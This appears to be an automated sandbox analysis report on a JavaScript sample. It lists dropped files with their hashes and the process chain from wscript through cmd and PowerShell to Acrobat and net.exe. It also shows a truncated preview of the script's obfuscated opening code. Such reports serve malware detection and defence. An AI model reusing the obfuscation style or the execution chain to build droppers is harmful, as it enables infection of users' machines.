SHA-512: | 661A6F5E5848E956B421DF8F3E4DD8709C3A92E2110E38D1923D52BD22A90BBD55656F4727D309167348A16E73E8012C237F0C2D9D4CC26CCA30E2F45DE7CDF4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.306701115825972 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJf+dPeUkwRe9:YvXKXyF7sdTeOOcG28Ukee9 |
MD5: | 93DE95D85C0C44ABFB42783D596A0024 |
SHA1: | A40AAF88FA779A3824E0E185E3BB7E529FE31EC9 |
SHA-256: | DA020A9D2057D3C840F63D7AEC4EA1B2182515D241C0DDED0278BDE18AC453AA |
SHA-512: | 1353FDA146F1174A16DBD4D6707B27E50845EFAB946DB57B32F666E19ABA0B13F1EC51DF89D0C804137A1070DCC301055E45E3EBAD401239A5F6E3437926E68B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.304011146636969 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJfbPtdPeUkwRe9:YvXKXyF7sdTeOOcGDV8Ukee9 |
MD5: | 064B6A208DD22A523D6C66C2BD49CA76 |
SHA1: | F3637F89AEBBE42709F3ED487F2ED0D75845777D |
SHA-256: | A058209AAF739A957CCA6C3550209633FB07C6A77FA2797A5E184DF1F26C59F3 |
SHA-512: | 725FAB22D505EA422E4361D1A47250DAA73845A7DA7E986F3869CC101F24AEABEA2A8995173D03C0F923603788AFCC8910B3451A69B0A123C2CEB47A0BE57626 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.30894781249916 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJf21rPeUkwRe9:YvXKXyF7sdTeOOcG+16Ukee9 |
MD5: | 25E26B88733D5CD12FF81FFC2D189B41 |
SHA1: | E8C6BCACC95601C276E4CA08612779B8417271B4 |
SHA-256: | 0CE4A3987416CBFE06A57BA89ADDEDD947B51DFFCC9BBA04A9BA42AF3AC04338 |
SHA-512: | A7AB7AE94C440973407414BF5DA1BFD558F4FF7B4446A84BB693308CB42CA823D7DE0880BB40FE72DAEB887E49BCA9EA6E77B41C131BC5C9B501C0ADFD278854 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.662224614518718 |
Encrypted: | false |
SSDEEP: | 24:Yv6XC7meOOpamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSN:YvOe7BgkDMUJUAh8cvMN |
MD5: | B3EB5C20D36EDCD1EE43B1316BE81994 |
SHA1: | 23A129847A0067046B322DFF7F6B67E031FFCAC7 |
SHA-256: | 689E29BDDBF788FB12CC6158553B9498AFC1DBF4B4A2AAD22417433379982191 |
SHA-512: | D4BECDF27F2403BC0B3A75C08330DE41AE3BDF79F0E76E16D5C51E275A0ECC310043243C2544FEBB8D79D3BF8496C6CB7B7807A231FA5829A8E6D388812208A3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.282481562632305 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJfshHHrPeUkwRe9:YvXKXyF7sdTeOOcGUUUkee9 |
MD5: | E4D7AF92F465D47DEAC12B4842C7D869 |
SHA1: | 07B71F5143A6E52830F6EC2570C5447129BD1C37 |
SHA-256: | 2A58816E4E0617C841A8AB325C47194D65A3B32D9560DD91742ECFBCC0B57E32 |
SHA-512: | A8D0114904D460551DDB680A86C55B7D1CD1E2A08F0B0E9DFE47EF32909746AC8D7CFEA5EEBD192AE31B7601D79701AF1268E9894F3752BB9CB837509F5A21B8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.2975127643705955 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJTqgFCrPeUkwRe9:YvXKXyF7sdTeOOcGTq16Ukee9 |
MD5: | 3693FD242CF3BE07228E0EF716C85345 |
SHA1: | FDD41E94372C8D7B19D874351F0231CC5AE66FBB |
SHA-256: | EEB855BC37F19A3228EBF9EE5802AF3116166D6344844C879A8D78B928122ADF |
SHA-512: | B244BF6BCDF641DEC742E1B952D226D86188DA0116D02C63395CE9C2BC063C614B84A41979AEBB949D8E84D6270EB7653B04B152296CA9568BCCD52CE3E9CF02 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.142351710983149 |
Encrypted: | false |
SSDEEP: | 24:YHkuZWZarDJ3ay47rhRZ4POgcITUJEKmLTjv3j0S9rH0gx2VCyi2LSXCt2VKuUZK:YHkuVty7DSFZLL9hQ9iRfVKuof6595 |
MD5: | 0BF985011286AB8CC32A80B9F10B1B03 |
SHA1: | 413C5300C55EA86E0C2EE221432446080E1F5134 |
SHA-256: | 108F353FC622060C24A0A5D5AD0EEC8024FAECA628EE42E0C1107F797259A884 |
SHA-512: | 5959F383EC37048BA80C2D1B029DE7A9E072F9F0C2CD37B3C33D0533E1658F7F870A5B78BB40818B4F26ED58BFA19B3BCD4AF610E07AC109BFABE65D9BBB1547 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.4544579168987233 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsdOlro:lNVmsw3SHtbDbPe0K3+fDZdI |
MD5: | 9F39932AB87180D69F5547D47CCBDEB4 |
SHA1: | A0F229E21A81148D149323A6AD49A8ABADD9183E |
SHA-256: | 8E3A9E54195ADBE9A88B7F99B5DABF6CAF3322BFC6DE8534D3EF457F5D1FB6FE |
SHA-512: | A7DB762B1F0EACC14208F01EF2A0AD5F1BC293B386D4340816B96BE3BB525980B4B68AD20FFCC3C962809D57619F25474ADC5C8E29BD3A900E1EABABC0F8548B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.957657643345413 |
Encrypted: | false |
SSDEEP: | 48:7MtrvrBd6dHtbGIbPe0K3+fDy2dsd/xqFl2GL7msY:7U3SHtbDbPe0K3+fDZd+KVmsY |
MD5: | 4CE5685963645721B543B61C3D2CBE5F |
SHA1: | A73BC2FF2AD548B7D034AE294018B80F4BD63849 |
SHA-256: | 8209AA81DBC6D820CD03294CE1656859197785FD85AF71A782A5FE7472E12F54 |
SHA-512: | 077D59F35EA31C23490044255001BB3B60CDC37C1971F582C3545E1A18C5BE1FAE63E7BFF91DBC60C713C73A6A2EDA0535DF8A4BA63DEDC39BEEA0520BFF466B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgx8UJuR2ttjb53AHh30PPfipH1LCYyu:6a6TZ44ADEx8UJiEtP5wZ06KK |
MD5: | 9887FD438357B867117828A904D6B762 |
SHA1: | BA6A62B132656DCDF7641F52F0C08CCAB691B1F4 |
SHA-256: | 432C04F0AFBED908082E5D3B196DBE453C8BF24B85815A532A2AA2DB1AA7AC35 |
SHA-512: | DD5D8BD9981D47349967A1F50346E549595C4FCD7AEAC0B26A4E061CACD6E3ED183D25EB2508099064634A01F497FB7BEAD4307ECA34724F456AE41C977D86FF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulxmH/lZ:NllUg |
MD5: | D904BDD752B6F23D81E93ECA3BD8E0F3 |
SHA1: | 026D8B0D0F79861746760B0431AD46BAD2A01676 |
SHA-256: | B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2 |
SHA-512: | 5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5217358039039093 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClETRgYle:Qw946cPbiOxDlbYnuRK+bDvw |
MD5: | 8947456CB80F8A6255BDF8E354017D0C |
SHA1: | AA4EC43B369FB40E5BAC1B9FDD15C14DB81740CB |
SHA-256: | C913D360B98ED32C838358DE2A37C39A81512175F7A6C79DC2C1EDDCE8DD518D |
SHA-512: | 0777C0611B8720435A4380EF66C8C4C06DCD115C66ED78E0FC46439EB8C34E9F02E2364D7F94E59315888E79EF523F85DFF89EEDB73E438C7C6378D814966375 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 15-34-09-995.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.345849056922734 |
Encrypted: | false |
SSDEEP: | 384:FxBmxR0xRFxRMxwixwXxw3Gxw/xwExwErxwMxw8x3Gx3nx3hx3qxSdxShxS3xzby:MLb |
MD5: | AE28117A21205EFA8432172E92DA606F |
SHA1: | 6C50FFB0896C3311902921E736A716E1B785C195 |
SHA-256: | 87C69C2A35D9F7578D4DA617A714BE310C812ED46CC8BA242CDAF90751803BC0 |
SHA-512: | CE25A35484B31A7834E3AE48D9A8E148F0FE7A0748995FB3D7403E480F887A959BBF9EF7048C6EA034A825268048BC412BA253EB8EF0843B3592E1F03071445B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.408540729291915 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRMs:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gR5 |
MD5: | 0751E6E5DB0B75332CD4FDF96EC91B21 |
SHA1: | 35BE64967013982101F9D78D8573921C4146571B |
SHA-256: | 9EA1B2136A2E51CE982551725EC2E45634C196B867FD4C5493966AEA0C15AC02 |
SHA-512: | 7ED7F2EDFB8C0CEA3C96D9EC97DB4667D1A02F10B6BCCF5CCDB0BC26FF07789FC30CF8DB78634946DCE5EC2ACFC66D83313E486EE978E17567A5E95BA71DE122 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:6DaWL07oSwYIGNPHGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:caWLxSwZGBGZn3mlind9i4ufFXpAXkru |
MD5: | 83861FA7ACFA3650A6004BB1FDC18F93 |
SHA1: | 441DEF17B266EAFA0777308C02FEEC8272A0E0B8 |
SHA-256: | 1A30A52C3CAA02993AB28CC870EA47311507D0121DD4FC90AE734FA8AC58E867 |
SHA-512: | E11048B0B5D82D9015F93C9AB36AE4FC2ED72ABE50B27FC982962C9135E5B4EBB90FFD0D555265FBE405AC711D5D44D8B6A658BF9883D017C1E5F53C6CC8EDF8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw |
MD5: | 8B9FA2EC5118087D19CFDB20DA7C4C26 |
SHA1: | E32D6A1829B18717EF1455B73E88D36E0410EF93 |
SHA-256: | 4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD |
SHA-512: | 662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:rBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOFjNOX1Lj3vfE4JvWTlP:r+Tegs661ybxrr/IxkB1mabFhOXZ/fEh |
MD5: | C14EBC9A03804BAB863F67F539F142C6 |
SHA1: | FD44F63771819778149B24DD4B073940F5D95BFA |
SHA-256: | A495629FA5E71EE50BB96F9C4CAEAC46E8B44BFC3F910A073348258F63DFAFCE |
SHA-512: | 8ED832A54A3925914E3BCFC96A3ABFF63A511ADAC79A869AD1569BB175CC1AF84E6C2BD20FA2187A5C3B733625EDE5D95C2172B24ED2F252835689F6D4A0F5A2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.892843932068803 |
TrID: | |
File name: | 61969293196726215.js |
File size: | 19'137 bytes |
MD5: | dabce3b426d8b6637cd397358c631695 |
SHA1: | 226eae684cf1695ba5472a8a01a40ee5ab1abaa5 |
SHA256: | f2e9c2eca6c58f72fa29bf9197f1a177c744c9de77cd5d9a804b294457f5b934 |
SHA512: | 116936624646636a1d0c760c4f5d2dd2e1bc5b517c6dbf4d39028b7c1e47416ad5ba286e85314e2dd16064d9e5d95f943718b97b2090b59b010cb133fa3e344b |
SSDEEP: | 384:41ffTm3euTRbID0Kc0mF+D8Ro7koDRp4mkEpSTX1fck8N1Sr3unf2:4lfTm3euTRbID0Kc0mF+D8Ro7koDRp4P |
TLSH: | 608244909C42C32DE7E67384A3456AA8B0DC03878A18D46D851A6FD4F3612A76FF177F |
File Content Preview: | function fqokko(){lasahsft=[1031,3079,5127,4103,2055,3072];var vectpqtv=this[ohptjp+seazbg+grvjw+fzjqzsdvx+lnkibyby+bczpa+ynjat+awnbbkbp](this[yilqyxydf+hxfpvg+ejxaj+grvjw+snabha+ohptjp+awnbbkbp][bgcioja+grvjw+lnkibyby+seazbg+awnbbkbp+lnkibyby+qvohddwpr+s |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 15:34:00 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66d140000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 15:34:01 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff605590000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 15:34:01 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 15:34:01 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 15:34:06 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 11 |
Start time: | 15:34:06 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff605590000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 15:34:06 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6fd9b0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 14 |
Start time: | 15:34:06 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 15 |
Start time: | 15:34:07 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 16 |
Start time: | 15:34:07 |
Start date: | 10/01/2025 |
